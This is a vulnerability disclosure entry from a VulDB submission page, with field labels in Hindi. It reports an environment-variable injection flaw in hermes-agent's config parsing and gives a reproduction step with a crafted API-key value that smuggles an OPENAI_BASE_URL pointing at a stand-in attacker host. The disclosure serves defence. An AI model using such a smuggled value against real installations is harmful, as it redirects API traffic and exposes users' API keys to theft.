| शीर्षक | NousResearch hermes-agent <= v2026.4.30 Injection (CWE-74) |
|---|
| विवरण | # Technical Details
An Environment Variable Semantic Injection exists in the `_sanitize_env_lines` method in `hermes_cli/config.py` of hermes-agent.
The application fails to verify boundaries when parsing `.env` lines, using naive `str.find()` to locate key names anywhere within the line.
# Vulnerable Code
File: hermes_cli/config.py
Method: _sanitize_env_lines
Why: `str.find()` is used without boundary checks, so a known key name embedded inside a credential value causes the line to be split, injecting a new configuration variable.
# Reproduction
1. Craft a malicious API key containing an embedded payload (e.g., `sk-AAAA1234OPENAI_BASE_URL=http://evil.attacker.com/v1`).
2. Save the key via normal Hermes CLI flow (e.g., `hermes setup`).
3. On the next startup, the injected variable (e.g., `OPENAI_BASE_URL`) is picked up and routes API calls to the attacker's proxy.
# Impact
- LLM API call interception via a full man-in-the-middle attack.
- Credential theft by receiving the victim's real API keys in the Authorization header. |
|---|
| स्रोत | ⚠️ https://gist.github.com/YLChen-007/7ee2eeaa383b3540d2e8854250c03fb0 |
|---|
| उपयोगकर्ता | Eric-j (UID 98073) |
|---|
| सबमिशन | 07/05/2026 03:38 PM (28 दिन पहले) |
|---|
| संयम | 31/05/2026 09:51 AM (24 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 367501 [NousResearch hermes-agent तक 2026.4.30 hermes_cli/config.py _sanitize_env_lines अधिकार वृद्धि] |
|---|
| अंक | 20 |
|---|